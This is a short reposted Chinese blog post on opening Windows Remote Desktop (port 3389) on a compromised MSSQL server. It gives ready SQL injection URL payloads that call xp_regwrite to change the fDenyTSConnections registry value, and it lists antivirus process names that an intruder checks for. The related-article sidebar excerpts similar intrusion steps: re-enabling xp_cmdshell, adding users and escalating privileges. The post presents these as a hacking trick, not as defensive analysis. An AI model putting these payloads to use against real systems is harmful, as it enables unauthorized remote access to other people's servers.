SQL语句直接开启3389(转)

最新推荐文章于 2023-10-02 18:00:00 发布
最新推荐文章于 2023-10-02 18:00:00 发布
阅读量148 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/lhq8998/p/7266188.html
版权

(( SQL语句直接开启3389 ))

 

3389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections

 

其中键值DenyTSConnections 直接控制着3389的开启和关闭,当该键值为0表示3389开启,1则

 

表示关闭。

 

而MSSQL的xp_regwrite的存储过程可以对注册进行修改,我们使用这点就可以简单的修改DenyTSConnections键值,从而控制3389的关闭和开启。

 

开启3389的SQL语句:

syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--

 

关闭3389的SQL语句:

syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;--

 

 

 

 

 

(( 常见杀软 ))

 

360tray.exe 360实时保护

 

ZhuDongFangYu.exe 360主动防御

 

KSafeTray.exe 金山卫士

 

McAfee McShield.exe 麦咖啡

 

SafeDogUpdateCenter.exe 服务器安全狗

转载于:https://www.cnblogs.com/lhq8998/p/7266188.html

weixin_33841503
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
excel生成sql语句小工具
12-09
《Excel生成SQL语句小工具详解》 在日常的数据处理工作中,我们经常需要将Excel表格中的数据导入到数据库中,而手动编写SQL插入语句既耗时又容易出错。为了解决这一问题,出现了一款名为“Excel生成SQL语句小工具”...
如何在accsss中执行sql语句
01-19
虽然Access提供了可视化的操作方法,但许多开发人员还是喜欢直接SQL语句操作数据表。如何在Access中打开SQL视图,对于初次使用Access的程序员可得费点时间呢。  1、ACESS2007  (1)点击“创建”–点击 “查询...
直接SQL连接器开启3389
Smile、2011、
12-28 254
一、用SQL连接器恢复XP_CMDSHLLE的命令 (1)SQL Query Analyzersp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入sp_addextendedproc 'xp_cmdshell','xpsql70.dll'去除sp...
SQL语句直接开启3389-***技巧
weixin_33701294的博客
05-11 159
作者:晓华 其实就是利用MSSQL的存储过程xp_regwrite 。大家在***MSSQL服务器的时候,苦于无法上传开3389工具和3389工具不免杀时,可以使用此招轻松开启33893389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConne...
SQL语句直接开启3389
weixin_33912445的博客
08-14 275
其实就是利用MSSQL的存储过程xp_regwrite 。大家在渗透MSSQL服务器的时候,苦于无法上传开3389工具和3389工具不免杀时,可以使用此招轻松开启33893389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections 其 中键值DenyTSCo...
提权SQL语句直接开启3389
weixin_34032621的博客
10-31 385
3389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections其中键值DenyTSConnections 直接控制着3389开启和关闭,当该键值为0表示3389开启,1则表示关闭。而MSSQL的xp_regwrite的存储过程可以对注册进行修...
mysql 3389_SQL语句直接开启3389
weixin_39797912的博客
01-27 296
其实就是利用MSSQL的存储过程xp_regwrite 。大家在渗透MSSQL服务器的时候,苦于无法上传开3389工具和3389工具不免杀时,可以使用此招轻松开启33893389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections其 中键值DenyTSConne...
SQL.zip_SQL语句_sql
09-24
本资料“SQL.zip”是针对SQL语句的基础学习,旨在帮助初学者快速入门并掌握基本的SQL操作。 SQL语句主要包括以下四大类型: 1. **数据查询语言(DQL)**:DQL用于检索数据库中的数据,最基础的命令是`SELECT`。例如...
如何使用SQL语句删除SN.doc
11-22
本文将详细介绍如何使用SQL语句来安全地删除特定的记录,避免不必要的数据丢失。在本例中,我们将聚焦于如何在BARCODE数据库中删除SN(序列号)相关的记录。 首先,我们需要远程登录到Barcode服务器,其IP地址为192...
如何不进去mysql直接执行sql语句
11-10
然而,如果你不想打开这个交互式shell,而是直接执行SQL语句,可以使用以下方法: 1. **使用 `-e` 参数**:`mysql -u [username] -p[password] -e "SQL命令"`。比如,如果你想创建一个名为`test`的数据库,命令会是...
五种方法开启3389
weixin_33936401的博客
12-26 1070
五种办法开启3389终端 -------------------------------------------------------------------------------- 2006-12-26 16:41:23 第一种方法: 使用的工具: 1:ipcscan扫描器 2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有C...
判断windows sql服务是否已启动_从sql注入到连接3389
weixin_39754398的博客
11-30 403
更多全球网络安全资讯尽在邑安全从sql注入到连接3389据库为sqlserver判断字符、数字型、闭合方式Microsoft OLE DB Provider for SQL Server 错误 '80040e14'遗漏字元字串 ' AND 显示状态Flag = 1 ORDER BY 排序 DESC ' 后面的引号。D:\S_JCIN\WEBSITE\OUTWEB\L_CT\NEWS\.....
sql语句开远程终端+建用户+2003添加远程桌面组用户
ssihc0的专栏
01-18 2222
<br />没有技术含量,纯属一次偶然中的方便, 代码在查询分析器上可以一步完成以上操作,在2003和XP实验已经成功. 代码如下:<br />___________________________________________________________________________________________<br /><br />xp_cmdshell 'echo Windows Registry Editor Version 5.00>>3389.reg'<br />go<br />xp
mysql 2008提权_实战SQL Server提权
weixin_35501678的博客
01-27 231
前言:在授权测试一网站时发现该网站已经被挂马。。aspx木马猜测出密码为admin,即可看到大马。。尝试自己的小马+菜刀进行连接。。拒绝访问发现该网站根目录下所有文件进行了访问控制。。无法上传自己的小马。没有办法,只能翻翻文件看看。。公众号getshell看到了公众号的配置以及地址。。(打马的地方)该文件夹下没有做访问控制,顺利上传getshell。。uploadsuccessok!添加管理员,打...
【网络安全-SQL注入(4)】一篇文章带你了解sql server数据库三大权限,以及三大权限的SQL注入,SQL注入点利用以及getshell
最新发布
m0_67844671的博客
10-02 2234
【网络安全-SQL注入】SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】-CSDN博客本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入】SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;
SQL注入篇——利用SqlServer执行系统命令连接远程桌面
爱国小白帽
02-12 2576
我们用到的函数是xp_cmdshell 利用此存储过程可以直接执行系统命令。 一、确立连接 输入IP+/1.php?id=1出现如下界面说明连接成功 二、使用master表开启xp_cmdshell服务 输入下列语句开启服务: ?id=1; use master; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC ...
sqlserver常用操作远程桌面命令
信安路上……
12-04 404
1.是否开启远程桌面,1表示关闭,0表示开启 EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server' ,'fDenyTSConnections' 2.读取远程桌面端口 EXEC master..xp_regread 'HKEY_LOCAL_MACHI...
渗透笔记
xiaoshan812613234的专栏
08-19 1628
SQL语句直接开启33893389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections 其中键值DenyTSConnections直接控制着3389开启和关闭,当该键值为0表示3389开启,1则表示关闭。而MSSQL的xp_regwrite的存储过程可
mssql提权总结
st3pby的博客
12-30 2680
mssql提权总结
powerdesignersql语句
09-19
PowerDesigner可以将数据模型换为SQL语句,具体步骤如下: 1. 打开PowerDesigner软件,选择需要换的数据模型。 2. 在菜单栏中选择“文件”-“导出”-“数据库”-“DDL”。 3. 在弹出的对话框中选择需要导出的数据库类型,如Oracle、MySQL等。 4. 点击“确定”按钮,PowerDesigner会自动生成对应的SQL语句。 5. 将生成的SQL语句保存到本地文件或直接复制到数据库管理工具中执行即可。 需要注意的是,PowerDesigner生成的SQL语句可能需要根据实际情况进行修改和调整,以确保数据模型能够正确换为数据库表结构。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值